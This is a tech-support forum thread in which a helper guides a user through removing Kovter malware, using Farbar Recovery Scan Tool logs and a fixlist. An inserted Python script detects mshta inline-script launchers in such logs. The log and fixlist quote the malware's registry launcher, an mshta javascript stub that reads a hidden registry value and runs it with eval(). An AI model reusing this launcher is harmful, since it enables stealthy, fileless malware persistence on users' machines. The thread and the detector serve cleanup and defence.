Task: {6DC323AF-E881-40DB-86B6-2688501CE555} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\Bootstrap.exe [2013-07-18] (Intel Corporation)
Task: {90C5AA67-EF23-490C-AFCE-431D19BC7B18} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {90F0D108-CFF4-4F30-8C9C-5B59ACAA6575} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2014-09-13] (Lenovo)
Task: {938017A0-02C6-4DF7-AEB0-6D3BE6B25996} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {9D9EE676-C781-48C4-AF2D-307B6C83E669} - System32\Tasks\Lenovo\SROptimizer => C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\\SRORest.exe [2012-03-05] (Lenovo Group Limited)
Task: {9DD3046C-36ED-4E44-9BBE-C23AC588FAB8} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {A94CD08B-C77E-4067-99A1-5D6B5DFD53FB} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\Bootstrap.exe [2013-07-18] (Intel Corporation)
Task: {B42F4A52-F3B1-4202-9829-30D4DEB32DF2} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-04-20] ()
Task: {B5C085DD-62CF-4F9B-863E-691BC8B15B81} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {C34C57A6-1780-4938-AD2E-D5E2595F7A9E} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-09-10] ()
Task: {C7978D9E-39F9-4D04-A5F3-99917A5E71E9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {D497E88F-86B7-47D5-8BFD-58BB151D6E9A} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)
Task: {DA927600-D95C-4BE2-86D4-0D34262FBA8E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-15] (Adobe Systems Incorporated)
Task: {EFF1F180-818C-44EE-99C3-35CE783B2461} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()
Task: {F19D65BF-FFD7-488E-81FC-CBFD694B199D} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-09-10] ()
Task: {F3DF85DF-DCFB-42F3-9E95-75B631729CA9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe
Task: {FB56393F-3829-44D5-97C4-9FA16D7AF324} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exeq-backgroundmon scripts\backgroundmon.xml
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2011-10-23 13:48 - 2016-04-14 06:08 - 00107008 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-10-23 13:43 - 2010-10-26 10:40 - 00049056 ____N () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
2011-10-23 13:46 - 2016-03-02 00:52 - 00102904 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-10-15 16:06 - 2016-09-10 12:13 - 00028544 _____ () C:\Program Files (x86)\Lenovo\System Update\SUService.exe
2007-04-18 19:30 - 2007-04-18 19:30 - 00393216 _____ () C:\Program Files (x86)\McAfee\Common Framework\cryptocme2.dll
2007-04-18 19:30 - 2007-04-18 19:30 - 00471040 _____ () C:\Program Files (x86)\McAfee\Common Framework\ccme_base.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:YYgShx7="J";m2a9=new ActiveXObject("WScript.Shell");TyNMG7="sm";tvu2T=m2a9.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");gN8SL="9XM";eval(tvu2T);IQNZF98="ul9qNBej";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 16:34 - 2009-06-10 11:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{557FD2C9-2A62-466B-8816-BE633032D5CD}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{03DFB3DC-2095-4510-A567-0FD1AC84D38E}] => (Allow) LPort=2869
FirewallRules: [{939994F3-B029-408E-A45B-656D662258E5}] => (Allow) LPort=1900
FirewallRules: [{FB2FBBC5-CFB5-4C0D-9B9D-AB475DA6AB32}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{35BA6FB7-E803-42FD-B4E5-C83BAC48B6FC}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{272A8282-9BDC-4E20-B536-3C4E8B96312B}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{05BDB8A8-4D5A-4E2D-A4F1-415929A64E19}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{AC727E4B-2EA7-4F3F-BFF0-F79E00246AF9}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{D4AD504C-892E-4438-BDE4-9DB67DD5B7BA}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{CC021E9A-1E83-4E51-997E-170E3B0D0E7B}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{11E3ABC0-8855-454E-AA19-D7473CD862E3}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [TCP Query User{F0458B1B-4AF2-4B5E-AC7E-5EC679054837}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [UDP Query User{7E53DAB9-4A4C-431A-AAAB-8AA0F88D2DE1}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{30334865-C066-41CD-9C1F-8254C57A1B1B}] => (Block) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{EEA64370-148F-4DA2-8044-A785490116B2}] => (Block) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{E1757C0D-F532-4F82-AE9E-3D9E867F2A08}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe
FirewallRules: [{CD716B18-5F73-4411-8B74-236BD61D44C8}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe
FirewallRules: [{803C93D3-96A6-446E-8D23-23BCADB6445A}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe
FirewallRules: [{4CB06D72-5D6E-49DF-A836-79D73949BD90}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe
FirewallRules: [{EC124B96-498B-4861-908B-3C4D7DAC6F87}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{87242A7F-F3FA-4D44-B1C7-A56539FCF863}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C07E1440-D3D1-4BB5-BA8C-5D939796F63C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{DAEDB0D2-9B07-4435-B2B8-F9470E3F1F5A}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{E363884B-A318-4E92-B78D-F56F23ECC504}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{3C9229B1-0649-4BBC-BDE6-E400F423E93A}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe
FirewallRules: [{B3A06D6F-A82C-457C-A2D5-CBF7B818DF20}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe
FirewallRules: [{275A5FF4-1C5D-4B8A-8691-4DF60A30A124}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

09-10-2016 22:13:22 Windows Update
09-10-2016 22:51:07 Windows Update
15-10-2016 15:29:16 Windows Update
15-10-2016 23:27:47 Restore Point Created by FRST
16-10-2016 00:44:12 Windows Update
18-10-2016 20:26:26 Restore Point Created by FRST
20-10-2016 21:52:50 Windows Update
20-10-2016 22:02:25 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/21/2016 09:12:42 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (8564) Asapi: (21:12:42:5440)(8564) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (10/21/2016 08:50:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 11:03:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 10:40:26 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 10:09:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 09:34:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CAMService.exe, version: 1.0.0.1, time stamp: 0x54077d08
Faulting module name: ntdll.dll, version: 6.1.7601.23543, time stamp: 0x57d2fde1
Exception code: 0xc0000005
Fault offset: 0x0000000000048d84
Faulting process id: 0x744
Faulting application start time: 0x01d22b6d77112805
Faulting application path: C:\Program Files\Intel\CAM\bin\CAMService.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: c1d54467-9760-11e6-928e-2477031f344c

Error: (10/20/2016 09:34:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 09:12:38 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (6512) Asapi: (21:12:38:1300)(6512) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (10/20/2016 08:54:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CAMService.exe, version: 1.0.0.1, time stamp: 0x54077d08
Faulting module name: ntdll.dll, version: 6.1.7601.23543, time stamp: 0x57d2fde1
Exception code: 0xc0000005
Fault offset: 0x0000000000048d84
Faulting process id: 0x760
Faulting application start time: 0x01d22b67ec92b291
Faulting application path: C:\Program Files\Intel\CAM\bin\CAMService.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 33deedad-975b-11e6-9a5e-2477031f344c

Error: (10/20/2016 08:54:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (10/21/2016 08:50:39 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom

Error: (10/21/2016 08:50:06 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

Error: (10/20/2016 11:03:30 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom

Error: (10/20/2016 11:02:58 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

Error: (10/20/2016 10:40:27 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom

Error: (10/20/2016 10:40:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

Error: (10/20/2016 10:09:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom

Error: (10/20/2016 10:08:54 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

Error: (10/20/2016 09:34:16 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The CAM Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/20/2016 09:34:06 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom


==================== Memory info ===========================

Processor: Intel® Core™ i5-2520M CPU @ 2.50GHz
Percentage of memory in use: 51%
Total physical RAM: 3979.23 MB
Available physical RAM: 1916.05 MB
Total Virtual: 7956.65 MB
Available Virtual: 5600.5 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:287.15 GB) (Free:217.93 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:1.54 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 8D14B1C3)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=287.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 

 

Viruscan on-access scanner has not detected Powelike!lnk or Powelike!bat or any other problem.  I will reboot, recheck and report if anything is detected.

I noticed after doing the fixes in post 7 of this thread that the icons for most of the web shortcuts on my desktop are white icons instead of the Firefox icon (default browser) and there are two desktop.ini files. If I create new shortcuts the icons are also white.  Tried deleting iconcache.db, changing default browser to IE and back to Firefox but the icons do not reset.  Is there a simple way to correct this?

Thank you for your help Aura!



#10 Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • Gender:Male
  • Local time:08:25 AM

Posted 22 October 2016 - 08:49 AM

There's only one Kovter entry left to delete, here goes.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:YYgShx7="J";m2a9=new ActiveXObject("WScript.Shell");TyNMG7="sm";tvu2T=m2a9.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");gN8SL="9XM";eval(tvu2T);IQNZF98="ul9qNBej";" <===== ATTENTION
    
    REG: REG QUERY "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" /s
    
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
And by white icon, do you mean this?
[image]

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.
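
The entry removed by the fixlist above is a registry-resident launcher: mshta.exe is handed an inline javascript: stub that reads a second registry value and passes it to eval(). As an added example (not part of the thread and not FRST's own logic), this Python script flags such lines in FRST output and lists the registry locations to re-check after a fix; the function names and the htafile control line are assumptions constructed for illustration.

```python
"""Flag mshta inline-script persistence entries in FRST log lines."""
import re
from dataclasses import dataclass

# FRST registry entry: "<key>: <command>", optionally tagged "<===== ATTENTION".
ENTRY_RE = re.compile(
    r'^(?P<key>HK[A-Z]+\\[^:>]+?):\s+(?P<cmd>.+?)(?:\s*<=+\s*ATTENTION)?\s*$')
# mshta.exe given an inline script URL rather than an .hta file path.
INLINE_RE = re.compile(
    r'mshta(?:\.exe)?"?\s+"?(?P<scheme>javascript|vbscript):', re.I)
# Registry value the stub pulls its real script body from.
REGREAD_RE = re.compile(r'RegRead\(\s*"([^"]+)"\s*\)', re.I)
SHELL_RE = re.compile(r'ActiveXObject\(\s*"WScript\.Shell"\s*\)', re.I)
EVAL_RE = re.compile(r'\beval\s*\(', re.I)

# First line is the entry quoted in the thread; the rest are benign controls
# (the htafile line is constructed for this example).
SAMPLE_LOG = r'''
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:YYgShx7="J";m2a9=new ActiveXObject("WScript.Shell");TyNMG7="sm";tvu2T=m2a9.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");gN8SL="9XM";eval(tvu2T);IQNZF98="ul9qNBej";" <===== ATTENTION
HKLM\SOFTWARE\Classes\htafile\Shell\Open\Command: "C:\Windows\system32\mshta.exe" "%1" %*
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
DNS Servers: 192.168.1.1
'''


@dataclass
class Finding:
    key: str              # registry key holding the launcher command
    scheme: str           # "javascript" or "vbscript"
    payload_values: list  # registry values the stub reads (JS escapes undone)
    reasons: list         # indicators that fired, in plain words


def analyze_line(line):
    """Return a Finding for a registry entry that starts mshta with an
    inline script, or None for anything else."""
    entry = ENTRY_RE.match(line.strip())
    if not entry:
        return None
    cmd = entry.group('cmd')
    inline = INLINE_RE.search(cmd)
    if not inline:
        return None  # mshta opening a file, or no mshta at all
    scheme = inline.group('scheme').lower()
    reasons = [f'mshta.exe launched with inline {scheme}: script']
    if SHELL_RE.search(cmd):
        reasons.append('creates WScript.Shell')
    # The log shows a JS string literal, so its backslashes are doubled.
    payloads = [p.replace('\\\\', '\\') for p in REGREAD_RE.findall(cmd)]
    if payloads:
        reasons.append('reads script body from the registry')
    if EVAL_RE.search(cmd):
        reasons.append('passes data to eval()')
    return Finding(entry.group('key'), scheme, payloads, reasons)


def scan_log(text):
    """Run analyze_line over every line of a log and keep the hits."""
    hits = (analyze_line(line) for line in text.splitlines())
    return [hit for hit in hits if hit is not None]


def verification_queries(finding):
    """Build reg.exe queries to confirm the launcher key and every value it
    reads are gone after cleanup."""
    queries = [f'reg query "{finding.key}" /s']
    for path in finding.payload_values:
        # WScript.Shell RegRead: last component is the value name, unless
        # the path ends in a backslash (then it is the key's default value).
        key, _, value = path.rpartition('\\')
        if value:
            queries.append(f'reg query "{key}" /v "{value}"')
        else:
            queries.append(f'reg query "{key}" /ve')
    return queries


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit.key)
        for reason in hit.reasons:
            print('  -', reason)
        for query in verification_queries(hit):
            print('  check:', query)
```

After a successful cleanup, each generated query should end with the same "unable to find the specified registry key or value" error that reg.exe prints for a missing key.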


#11 pmate888

Posted 22 October 2016 - 01:29 PM

hi Aura

I created the fixlist.txt file and ran FRST fix as instructed.  The contents of the Fixlog.txt file are:

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (22-10-2016 08:00:48) Run:5
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:YYgShx7="J";m2a9=new ActiveXObject("WScript.Shell");TyNMG7="sm";tvu2T=m2a9.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");gN8SL="9XM";eval(tvu2T);IQNZF98="ul9qNBej";" <===== ATTENTION

REG: REG QUERY "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" /s
*****************

Processes closed successfully.
"HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" => key removed successfully

========= REG QUERY "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" /s =========

ERROR: The system was unable to find the specified registry key or value.


========= End of Reg: =========



The system needed a reboot.

==== End of Fixlog 08:00:51 ====

 

FRST recommended a reboot and I complied, no problems surfaced.

I resolved the desktop.ini files problem by going into Windows Explorer folder and search options and selecting "Don't show hidden files, folders or drives" and checking the "Hide protected operating system files" lines.  The desktop.ini files are not displayed anymore.

The white icons for web shortcuts problem remains.  The white icons look like the image in your last response.

Thank you very much for your help!  I recommended my friends come to bleepingcomputer.com if they have virus, malware, etc problems for expert help rather than guessing on fixes found by Google searches.  My problem may have been a minor thing to you but I would not have been able to fix it on my own and I really appreciate your assistance!



#12 Aura

Posted 22 October 2016 - 02:11 PM

Yes, the desktop.ini files are hidden system files, so if you check the option to hide them, you won't see them anymore.

If you click on a shortcut, does it still open in one of your web browsers (if so, which one), or does it ask you what program you want to open that file with?

And we're always ready to assist whoever needs help here, so feel free to recommend BleepingComputer to everyone you know :)



#13 pmate888

Posted 23 October 2016 - 01:27 AM

hi Aura

The shortcuts open in Firefox, my default browser.  The shortcuts work ok in that they open the webpage correctly but it just displays the white page icon.  It normally has the browser icon or a webpage icon.

Existing shortcut icons display the white page icon. If I change default browser to Google Chrome or Internet Explorer, the icons do not change, it still displays the white page icon.

If I create a new shortcut by highlighting the url from Internet Explorer browser or Google Chrome browser (both not default browser) and drag to desktop, the shortcut displays the browser icon or webpage icon.  If I create a new shortcut by highlighting the url from Firefox browser, the shortcut displays the white page icon.

Can't figure out how to correct this, any help you can provide would be really appreciated.

thank you!



#14 Aura

Posted 23 October 2016 - 09:21 AM

Let's check something.

> if i create a new shortcut by highlighting the url from internet explorer browser or google chrome browser (both not default browser) and drag to desktop, the shortcut displays the browser icon or webpage icon.

Right-click on one of these icons, and select Properties, then go to the General tab. What's the Type of file (name and extension)?

> if i create a new shortcut by highlighting the url from firefox browser, the shortcut displays the white page icon.

Follow the same instructions as above for one of these shortcuts as well, and give me the Type of file (name and extension).



#15 pmate888

Posted 23 October 2016 - 01:21 PM

hi Aura

Type of file for the shortcut icon created by Internet Explorer says "Pinned Site Shortcut (.website)"

Type of file for the shortcut icon created by Google Chrome says "Internet Shortcut (.url)"

Type of file for the shortcut icon created by Firefox (default browser) says "Internet Shortcut (.URL)"

thank you for your help!





